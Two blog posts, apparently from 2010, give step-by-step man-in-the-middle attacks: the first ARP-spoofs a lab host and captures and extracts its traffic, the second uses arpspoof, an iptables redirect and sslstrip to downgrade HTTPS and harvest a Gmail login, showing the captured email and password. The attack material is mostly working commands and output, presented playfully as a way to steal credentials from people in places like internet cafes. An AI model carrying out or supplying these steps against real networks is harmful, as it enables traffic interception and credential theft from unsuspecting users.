mitm packet capturing & basic analysis

17 06 2010

We all know the difference between a hub & a switch (if not, this is not the blog for you). As most networks these days will be switched, its no longer a case of plug in & dump packets. So here is the easy way to capture traffic from the network for investigation later. This works with wired or wireless. This is a combination of skillz in my SSLSTRIP post and the Image Extraction post.

Simply put, we use arpspoof to convince the gateway that we are the target, and the target that we are the gateway.

Target selection (our IP is 172.16.189.136, default gateway is 172.16.189.2)

root@bt:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:ab:b2:2c
          inet addr:172.16.189.136  Bcast:172.16.189.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:22 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3682 (3.6 KB)  TX bytes:1753 (1.7 KB)
          Interrupt:19 Base address:0x2000

root@bt:~# netstat -nr
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
172.16.189.0    0.0.0.0         255.255.255.0   U         0 0          0 eth0
0.0.0.0         172.16.189.2    0.0.0.0         UG        0 0          0 eth0

root@bt:~# nmap -sP 172.16.189.1-255

Starting Nmap 5.21 ( http://nmap.org ) at 2010-06-17 21:10 EST
Nmap scan report for 172.16.189.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 172.16.189.2
Host is up (0.0015s latency).
MAC Address: 00:50:56:E5:F7:F0 (VMware)
Nmap scan report for 172.16.189.135
Host is up (0.00076s latency).
MAC Address: 00:0C:29:09:04:71 (VMware)
Nmap scan report for 172.16.189.136
Host is up.
Nmap scan report for 172.16.189.254
Host is up (0.00050s latency).
MAC Address: 00:50:56:F8:EC:20 (VMware)
Nmap done: 255 IP addresses (5 hosts up) scanned in 4.36 seconds
root@bt:~#

So we have a couple of other hosts there, we will use 172.16.189.135.

We want to get traffic from 172.16.189.135 to the gateway (internet) sent to us, and traffic from the gateway back to 172.16.189.135 also sent to us, we do that with the following arpspoof commands.

Windows host before arpspoof:

C:\Documents and Settings\Administrator>arp -a

Interface: 172.16.189.135 --- 0x2
  Internet Address      Physical Address      Type
  172.16.189.2          00-50-56-e5-f7-f0     dynamic

arpspoof commands to run on our backtrack box, not forgetting to enable ip forwarding

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward

root@bt:~# arpspoof -i eth0 -t 172.16.189.135 172.16.189.2
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 172.16.189.2 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 172.16.189.2 is-at 0:c:29:ab:b2:2c

root@bt:~# arpspoof -i eth0 -t 172.16.189.2 172.16.189.135
0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply 172.16.189.135 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply 172.16.189.135 is-at 0:c:29:ab:b2:2c

and our windows box ?

C:\Documents and Settings\Administrator>arp -a

Interface: 172.16.189.135 --- 0x2
  Internet Address      Physical Address      Type
  172.16.189.2          00-0c-29-ab-b2-2c     dynamic
  172.16.189.136        00-0c-29-ab-b2-2c     dynamic

and of course, kick off your tcpdump session (without the arpspoof traffic)

root@bt:~# tcpdump -s0 -i eth0 not arp -w eth0capture
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes

so, we have a shiny new file, full of data goodness – what to do with it. There are several ways you can look at the data:
urlsnarf – prints http requests
driftnet – extracts files from capture
tcpxtract – another extractor from captures **Needs installation, but it got me the best results**

Setup the apps to listen on the local interface in separate windows, then feed your packets into that interface with tcpreplay.

root@bt:~# urlsnarf -i lo
urlsnarf: listening on lo [tcp port 80 or port 8080 or port 3128]

root@bt:~# driftnet -i lo
driftnet: saving `/tmp/driftnet-5VbG3g/driftnet-4c1a110b643c9869.jpeg' as `driftnet-0.jpeg'
driftnet: saving `/tmp/driftnet-5VbG3g/driftnet-4c1a110b643c9869.jpeg' as `driftnet-1.jpeg'

root@bt:~# tcpreplay -i lo eth0capture-s0
sending out lo
processing file: eth0capture-s0
Actual: 18412 packets (15604605 bytes) sent in 105.88 seconds
Rated: 148490.3 bps, 1.13 Mbps/sec, 175.20 pps

Statistics for network device: lo
        Attempted packets:         18412
        Successful packets:        18412
        Failed packets:            0
        Retried packets (ENOBUFS): 0
        Retried packets (EAGAIN):  0


root@bt:~# apt-get install tcpxtract
root@bt:~# mkdir tcpxtract
root@bt:~# tcpxtract -f eth0capture-s0 -o tcpxtract/
Found file of type "html" in session [207.46.170.10:20480 -> 172.16.189.135:7429], exporting to tcpxtract/00000000.html
Found file of type "html" in session [207.46.170.10:20480 -> 172.16.189.135:7429], exporting to tcpxtract/00000001.html

There we go, we extracted some info from the packet capture. Next time I will cover a much nicer util to get our files out of the capture file.

Advertisements




capturing credentials with sslstrip

11 06 2010

You may or may not have seen this tool before, there are plenty of videos around that show you how to use it – let me add one more “howto” & show you my fun with it.

Scenario:

You are attached to the same network (sorry kids, not a remote vector) as the victim with a backtrack (doesnt need to be backtrack, but I use it regularly) machine and have downloaded sslstrip.

Get it: download & unpack

root@bt:~/scripts/sslstrip# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
root@bt:~/scripts/sslstrip# tar zxvf sslstrip-0.7.tar.gz

Setup: you need to enable ip forwarding in linux & setup a forward for all port 80 traffic to port 10000 (default sslstrip port). Run sslstrip & get it to write the credentials out to a file with -w

root@bt:~/scripts/sslstrip# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~/scripts/sslstrip# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
root@bt:~/scripts/sslstrip/sslstrip-0.7# python sslstrip.py -f -w sslcreds-captured

Once this is done, we are nearly there – now to get users to send their traffic through your machine on the way to the gateway. In this case, the target is 192.168.0.141 & the real gateway is 192.168.0.254

root@bt:~# arpspoof -i eth0 -t 192.168.0.141 192.168.0.254
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 192.168.0.254 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 192.168.0.254 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 192.168.0.254 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 192.168.0.254 is-at 0:c:29:ab:b2:2c

Cool – so now what … what have we actually done … lets deconstruct it a little:

Firstly linux has been configured to forward packets, we setup a redirect iptables rule to redirect all traffic except port 80, which it sends to sslstrip which we ran on the default port 10000 and we are writing out to log sslcreds-captured.

Next was to get the target to send their traffic to us instead of the gateway, using arpspoof we are telling our target that the gateway address of 192.168.0.254 is actually our nic

Our Target machine nic is 00-0C-29-09-04-71, which arpspoof automatically gathered when we ran it.

We could have easily gathered this from the backtrack machine

root@bt:~# nmap -sP 192.168.0.141

Starting Nmap 5.21 ( http://nmap.org ) at 2010-06-10 22:18 EST
Nmap scan report for 192.168.0.141
Host is up (0.00049s latency).
MAC Address: 00:0C:29:09:04:71 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds

but to show the actual client config, here is the windows ipconfig /all output

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter

Physical Address. . . . . . . . . : 00-0C-29-09-04-71
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.0.141
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.254
DHCP Server . . . . . . . . . . . : 192.168.0.254
DNS Servers . . . . . . . . . . . : 8.8.8.8
Lease Obtained. . . . . . . . . . : Thursday, 10 June 2010 8:54:17 PM
Lease Expires . . . . . . . . . . : Friday, 11 June 2010 8:54:17 PM

So, what does the arp spoofing look like on the target
Before:

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.0.141 --- 0x2
Internet Address      Physical Address      Type
192.168.0.254         00-02-b3-a9-a5-13     dynamic

After:

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.0.141 --- 0x2
Internet Address      Physical Address      Type
192.168.0.254         00-0c-29-ab-b2-2c     dynamic

Notice the original gateway MAC address 00-02-b3-a9-a5-13 has been replaced by our attacker MAC 00-0c-29-ab-b2-2c.

User Experience:
We will use GMAIL as an example of this, but many many web pages use http for the body & simply use https for form post, which this script takes advantage of.

So our user wants to login to their GMAIL account, so they fire up the browser & type in http://www.gmail.com

Normal GMAIL page:

***Notice the url is https://http://www.google.com/accounts/……… & there is a padlock on the right hand side***

sslstrip GMAIL page:

***Notice the url is actually http://http://www.google.com/accounts/……… & there is a padlock on the left hand side, this padlock is actually a favicon of a padlock added by sslstrip to trick those not paying attention***

This is the only subtle difference that the user gets, sslstrip detects the https tags in the pages requested & re-writes them as http back to the client. From sslstrip to the server is still https, so GMAIL is happy its an ssl connection & the target is happy as he sees the identical logon page he is used to seeing, only its delivered as an http page, not https. As we are not trying to rewrite an https page back to the user, there are zero certificate popups etc.

So he logs in, gets his mail & lives happily ever after:

THE FUN BIT:

Remember we were writing to an output file

root@bt:~/scripts/sslstrip/sslstrip-0.7# cat sslcreds-captured
2010-06-10 22:07:25,992 SECURE POST Data (www.google.com):
ltmpl=default&ltmplcache=2&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3F&service=mail&rm=false&dsh=3964009503580918215&ltmpl=default&ltmpl=default&scc=1&GALX=EN7ZeXSvfzo&Email=johndoe@gmail.com&Passwd=J0hN%24_Sup3Rl33tP@ssw0rd&rmShown=1&signIn=Sign+in&asts=

The most interesting bits of that are ..
Email=johndoe@gmail.com
Passwd=J0hN%24_Sup3Rl33tP@ssw0rd
*note, the %24 is actually the hex value for the dollar ‘$’ symbol
Because johndoe is super secure & has chosen a long password he must be safe …. except for that one time he connected at the wrong internet cafe ……

GaMe-OvEr